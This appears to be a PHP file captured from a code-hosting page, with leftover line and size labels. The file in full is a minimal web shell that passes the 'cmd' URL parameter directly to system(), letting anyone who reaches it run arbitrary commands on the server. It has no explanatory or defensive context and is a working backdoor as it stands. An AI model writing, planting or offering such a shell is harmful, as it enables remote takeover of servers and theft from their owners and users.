6 lines
75 B
Plaintext
6 lines
75 B
Plaintext
|
<?php
|
||
|
if(isset($_GET['cmd'])) {
|
||
|
system($_GET['cmd']);
|
||
|
}
|
||
|
?>
|